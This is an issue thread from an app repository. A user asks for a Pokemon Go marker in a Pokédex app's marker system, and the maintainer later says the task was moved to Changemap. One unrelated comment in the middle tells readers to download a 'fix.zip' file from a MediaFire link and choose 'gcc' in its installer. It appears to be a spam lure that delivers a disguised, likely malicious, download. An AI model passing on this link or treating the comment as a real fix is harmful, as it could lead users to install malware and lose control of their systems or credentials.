### ISSUE TITLE
Pokemon Go marker in additional markers section

### ISSUE THREAD

**Issue by sdcervi** [sdcervi/PokeDexApp#85]
User request: "Another one (that’s way less important) would be to add a mark for Pokemon Go to the newish marker system."

**Comment by IvanJrX** [comment]
Download 
https://www.mediafire.com/file/ynhx37qmyqek881/fix.zip/file
In the installer menu, select "gcc."

**Comment by sdcervi** [comment]
Migrated to Changemap: https://changemap.co/stephanie-cervi-design/pokedex/task/9598-pokemon-go-marker/
